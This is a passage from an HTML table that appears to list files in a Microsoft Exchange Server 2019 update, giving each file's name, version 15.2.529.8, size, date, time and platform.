applicable</td><td>36,336</td><td>01-Jan-2020</td><td>11:21</td><td>Not 
applicable</td></tr><tr><td>Manage_metacachedatabase.ps1</td><td>Not applicable</td><td>51,334</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Mce.dll</td><td>15.2.529.8</td><td>1,693,264</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Measure_storeusagestatistics.ps1</td><td>Not applicable</td><td>29,483</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Merge_publicfoldermailbox.ps1</td><td>Not applicable</td><td>22,623</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.database.isam.dll</td><td>15.2.529.8</td><td>127,864</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>15.2.529.8</td><td>25,984</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll</td><td>15.2.529.8</td><td>68,472</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.eventlog.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.dll</td><td>15.2.529.8</td><td>233,344</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.comon.dll</td><td>15.2.529.8</td><td>1,776,232</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>15.2.529.8</td><td>505,416</td><td>01-Jan-2020</td><td>11:19</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>15.2.529.8</td><td>76,152</td><td>01-Jan-2020</td><td>11:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.anchorservice.dll</td><td>15.2.529.8</td><td>135,552</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>15.2.529.8</td><td>23,424</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>15.2.529.8</td><td>27,216</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>15.2.529.8</td><td>53,632</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>15.2.529.8</td><td>925,056</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>15.2.529.8</td><td>26,192</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.assistants.interfaces.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.audit.azureclient.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>15.2.529.8</td><td>70,520</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.dll</td><td>15.2.529.8</td><td>94,592</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></t
r><tr><td>Microsoft.exchange.authadmin.eventlog.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadminservicelet.dll</td><td>15.2.529.8</td><td>36,944</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.configuration.dll</td><td>15.2.529.8</td><td>79,736</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>15.2.529.8</td><td>396,160</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>15.2.529.8</td><td>21,368</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.autodiscoverv2.dll</td><td>15.2.529.8</td><td>57,424</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.bandwidthmonitorservicelet.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.batchservice.dll</td><td>15.2.529.8</td><td>35,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>15.2.529.8</td><td>276,352</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>15.2.529.8</td><td>16,456</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>15.2.529.8</td><td>25,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.certificatenotification.eventlog.dll</td><td>15.2.529.8</td><td>13,688</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatenotificationservicelet.dll</td><td>15.2.529.8</td><td>23,416</td><td>01-Jan-2020</td><td>11:22</td><td>x86</
td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>15.2.529.8</td><td>376,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>15.2.529.8</td><td>83,840</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>15.2.529.8</td><td>2,971,008</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.server.dll</td><td>15.2.529.8</td><td>5,029,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.servervariantconfiguration.dll</td><td>15.2.529.8</td><td>893,816</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>15.2.529.8</td><td>413,776</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>15.2.529.8</td><td>924,544</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.bandwidthmonitor.dll</td><td>15.2.529.8</td><td>31,824</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.dll</td><td>15.2.529.8</td><td>52,296</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.extensions.dll</td><td>15.2.529.8</td><td>21,888</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.diskmonitor.dll</td><td>15.2.529.8</td><td>33,656</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>15.2.529.8</td><td>3,515,264</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>15.2.529.8</td><td>108,616</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>15.2.529.8</td><td>288,632</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Mic
rosoft.exchange.cluster.shared.dll</td><td>15.2.529.8</td><td>625,744</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.agentconfig.transport.dll</td><td>15.2.529.8</td><td>86,400</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.componentconfig.transport.dll</td><td>15.2.529.8</td><td>1,831,504</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.adagentservicevariantconfig.dll</td><td>15.2.529.8</td><td>31,608</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.directoryvariantconfig.dll</td><td>15.2.529.8</td><td>465,792</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.domtvariantconfig.dll</td><td>15.2.529.8</td><td>25,464</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.ismemberofresolverconfig.dll</td><td>15.2.529.8</td><td>38,272</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.tenantrelocationvariantconfig.dll</td><td>15.2.529.8</td><td>102,776</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.topologyservicevariantconfig.dll</td><td>15.2.529.8</td><td>48,504</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.diskmanagement.dll</td><td>15.2.529.8</td><td>67,448</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>15.2.529.8</td><td>172,920</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.encryption.variantconfig.dll</td><td>15.2.529.8</td><td>113,528</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>15.2.529.8</td><td>13,904</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.infere
nce.dll</td><td>15.2.529.8</td><td>130,424</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.optics.dll</td><td>15.2.529.8</td><td>63,864</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>15.2.529.8</td><td>19,832</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.protocols.popimap.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.dll</td><td>15.2.529.8</td><td>108,920</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.eventlog.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.smtp.dll</td><td>15.2.529.8</td><td>51,576</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll</td><td>15.2.529.8</td><td>36,728</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.azure.dll</td><td>15.2.529.8</td><td>27,512</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.monitoringconfig.dll</td><td>15.2.529.8</td><td>1,042,512</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>15.2.529.8</td><td>29,264</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditlogpumper.messages.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.core.dll</td><td>15.2.529.8</td><td>181,328</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.messages.dll</td><td>15.2.529.8</td><td>30,080</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Micr
osoft.exchange.compliance.common.dll</td><td>15.2.529.8</td><td>22,400</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.crimsonevents.dll</td><td>15.2.529.8</td><td>85,880</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>15.2.529.8</td><td>41,336</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.recordreview.dll</td><td>15.2.529.8</td><td>37,248</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.supervision.dll</td><td>15.2.529.8</td><td>50,768</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskcreator.dll</td><td>15.2.529.8</td><td>33,144</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributioncommon.dll</td><td>15.2.529.8</td><td>1,100,152</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributionfabric.dll</td><td>15.2.529.8</td><td>206,712</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskplugins.dll</td><td>15.2.529.8</td><td>210,816</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.compression.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>15.2.529.8</td><td>37,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.core.dll</td><td>15.2.529.8</td><td>145,792</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.core.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:22</td>
<td>x64</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>15.2.529.8</td><td>53,112</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.eventlog.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.dll</td><td>15.2.529.8</td><td>23,632</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.failfast.dll</td><td>15.2.529.8</td><td>54,648</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.failfast.eventlog.dll</td><td>15.2.529.8</td><td>13,688</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>15.2.529.8</td><td>1,845,840</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>15.2.529.8</td><td>30,288</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>15.2.529.8</td><td>68,688</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.eventlog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll</td><td>15.2.529.8</td><td>21,376</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.connectiondatacollector.dll</td><td>15.2.529.8</td><td>25,976</td
><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.common.dll</td><td>15.2.529.8</td><td>169,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.eas.dll</td><td>15.2.529.8</td><td>330,112</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.imap.dll</td><td>15.2.529.8</td><td>174,152</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.pop.dll</td><td>15.2.529.8</td><td>71,240</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>15.2.529.8</td><td>203,640</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.context.client.dll</td><td>15.2.529.8</td><td>27,008</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.configuration.dll</td><td>15.2.529.8</td><td>51,576</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.core.dll</td><td>15.2.529.8</td><td>51,064</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.datamodel.dll</td><td>15.2.529.8</td><td>46,976</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>15.2.529.8</td><td>1,093,496</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.timezone.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.deep.dll</td><td>15.2.529.8</td><td>326,736</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>15.2.529.8</td><td>3,352,952</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>15.2.529.8</td><td>35,920</td><td>01-Jan-2020</td><td>11:22</td><td>x64</
td></tr><tr><td>Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.connectors.dll</td><td>15.2.529.8</td><td>165,240</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.consumermailboxprovisioning.dll</td><td>15.2.529.8</td><td>619,600</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>15.2.529.8</td><td>7,788,624</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>15.2.529.8</td><td>80,488</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>15.2.529.8</td><td>1,789,312</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.groupmailboxaccesslayer.dll</td><td>15.2.529.8</td><td>1,626,488</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ha.dll</td><td>15.2.529.8</td><td>375,168</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.imageanalysis.dll</td><td>15.2.529.8</td><td>105,848</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxfeatures.dll</td><td>15.2.529.8</td><td>15,952</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxloadbalance.dll</td><td>15.2.529.8</td><td>224,640</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>15.2.529.8</td><td>186,752</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.contracts.dll</td><td>15.2.529.8</td><td>39,800</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.dll</td><td>15.2.529.8</td><td>119,160</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft
.exchange.data.msosyncxsd.dll</td><td>15.2.529.8</td><td>968,288</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.notification.dll</td><td>15.2.529.8</td><td>141,384</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.personaldataplatform.dll</td><td>15.2.529.8</td><td>769,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>15.2.529.8</td><td>139,640</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.provisioning.dll</td><td>15.2.529.8</td><td>56,696</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.rightsmanagement.dll</td><td>15.2.529.8</td><td>452,984</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.scheduledtimers.dll</td><td>15.2.529.8</td><td>32,640</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>15.2.529.8</td><td>256,896</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>15.2.529.8</td><td>11,809,864</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>15.2.529.8</td><td>37,760</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.storageconfigurationresources.dll</td><td>15.2.529.8</td><td>655,736</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storeobjects.dll</td><td>15.2.529.8</td><td>175,488</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>15.2.529.8</td><td>36,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>15.2.529.8</td><td>14,200</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><
td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>15.2.529.8</td><td>14,416</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll</td><td>15.2.529.8</td><td>14,928</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>15.2.529.8</td><td>72,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.delivery.eventlog.dll</td><td>15.2.529.8</td><td>13,392</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.certificatelogger.dll</td><td>15.2.529.8</td><td>22,912</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>15.2.529.8</td><td>2,212,736</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.performancelogger.dll</td><td>15.2.529.8</td><td>23,936</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.common.dll</td><td>15.2.529.8</td><td>546,680</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.eventlog.dll</td><td>15.2.529.8</td><td>215,416</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exchangejobs.dll</td><td>15.2.529.8</td><td>194,640</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exe</td><td>15.2.529.8</td><td>146,304</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll</td><td>15.2.529.8</td><td>27,520</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregation.eventlog.dll</td><td>15.2.529.8</td><td>13,696</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregationserv
icelet.dll</td><td>15.2.529.8</td><td>49,528</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.eventlog.dll</td><td>15.2.529.8</td><td>28,240</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.exe</td><td>15.2.529.8</td><td>208,768</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.disklocker.events.dll</td><td>15.2.529.8</td><td>88,960</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.disklocker.interop.dll</td><td>15.2.529.8</td><td>32,632</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.calendarmigration.dll</td><td>15.2.529.8</td><td>46,160</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.common.dll</td><td>15.2.529.8</td><td>19,024</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.dll</td><td>15.2.529.8</td><td>473,680</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.ha.events.dll</td><td>15.2.529.8</td><td>206,208</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.dxstore.ha.instance.exe</td><td>15.2.529.8</td><td>36,936</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.eac.flighting.dll</td><td>15.2.529.8</td><td>131,664</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>15.2.529.8</td><td>21,888</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>15.2.529.8</td><td>148,352</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>15.2.529.8</td><td>220,024</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>15.2.52
